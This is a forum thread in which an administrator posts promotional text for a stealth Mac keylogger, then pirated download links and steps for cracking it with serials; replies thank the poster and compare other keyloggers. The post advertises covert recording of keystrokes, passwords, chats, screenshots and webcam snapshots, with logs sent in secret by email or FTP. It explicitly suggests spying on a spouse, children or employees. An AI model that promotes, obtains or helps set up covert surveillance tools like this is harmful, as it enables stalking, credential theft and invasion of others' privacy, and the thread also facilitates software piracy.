Mac Perfect Keylogger for Mac 2.0 / 2.2 / 2.5

Discussion in 'Software Downloads' started by Mr. Penguin, 25 Oct 2012.

1. Mr. Penguin

Mr. Penguin Administrator
    Staff Member VIP Admin

Perfect Keylogger has the best quality on the market for the best price! With this Mac key logger you'll receive all keystrokes, IM chats, websites visited and screenshots from your Mac by email - or get everything uploaded to a website. Stealth surveillance software for Mac - as easy as never before! Watch your kids or employees, find out if your spouse is cheating and even more! You'll always know the Truth!

[​IMG]
    [​IMG]

Perfect Keylogger for Mac features
    • Stealth and undetectable surveillance - the program runs in invisible mode
    • Easy and fast installation - without reboot
    • Keystroke logging and application monitoring - keylogger will record all keystrokes typed in every application*
    • Password recording in all applications ( +$12 USD, click here to add it to your order )
    • Retina display support for the new MacBook Pro (new, see screenshot below)
    • Records all Mac users in multi-user environment, including guest account! (new)
    • Records chat conversations for the latest versions of iChat, Messages, AIM, Adium, Proteus, Skype, Yahoo IM, MSN (Microsoft IM). Facebook chats can be recorded if you use the latest AIM or Adium messenger for chatting. The chats are recorded fully (both ways)
    • Website recording (records all web addresses/titles visited in all popular web browsers)
    • New! Website blocking, based on simple black lists
    • Screenshot recording (with selective recording of the apps you need)
    • Snapshot recording with an iSight camera. Find out what's happening in your room while you're away!
    • Slideshow playback
    • Keystroke and screenshot recording in Windows applications (if you use Parallels Desktop, VMware Fusion or other virtual machine for Mac OS X to run Windows)
    • Email delivery - log files can be invisibly emailed to you (including keystrokes, chats, websites, screenshots)
    • Emailed logs can be received and reviewed on a Mac, Windows PC or any other device with email support (including iPhone and iPad)
    • FTP support (you can secretly upload keystrokes, chats, websites and screenshots to your website or another computer)
    • Simple built-in Log Viewer - offers easy navigation through the log files
    • Password protection
    • Can be installed into every user account of your Mac
    • Fully supports Mac OS X 10.4 and later (Tiger, Leopard, Snow Leopard, Lion and Mountain Lion)
    • Limited support for Mac OS 10.3.x (Panther) - keystroke recording / emailing only
    • Universal build (for Intel/Power PC)
    • Available in English, German, French, Spanish, Italian, Dutch and Norwegian
    • Friendly and easy to use user interface - even for novices!
    • Great price - much more affordable than competing products!
    • One-time payment without subscription fees, plus a lifetime license and tech. support!
    • Great volume discounts!
    Additional details:
    Note
    2.2 is the latest working version but has been reported not to work with 10.7 and 10.8. Only 2.5+ has been reported to work with Mountain Lion (10.8).

Developer Website
    Blazing Tools

Download v1.7.8 & 2.0
    Mirrorcreator

Password
    https://xiaopan.co/forums/

Instructions
    1) Install 1.7.8
    2) Open it, add one of the listed serials to the program
    3) Install version 2.0
    4) Upgrade to 2.6 (untested, but 2.6 you should be able to upgrade, providing you have the file..which you need to purchase)

There is a Perfect Keylogger for Mac 2.2 K'ed Torrent, but haven't tested that as well. Please give us some feedback. Thanks.

Torrent v2.2
    Piratebay

• Like Like x 1
  2. fatz

fatz Member

Great post - much appreciated ;-)

3. Scophie Cooper

Nice post since I come here.

• Like Like x 1
  4. hesterl

hesterl Member

Thanks, but I used anykeylogger for mac . Before I bought it, I compared many keyloggers and I found that many of them are the same function, but the anykeylogger for mac is the cheapest, so after try I chose it. Not a bad choice at present.

5. devilan05

devilan05 Member

How could I download the file?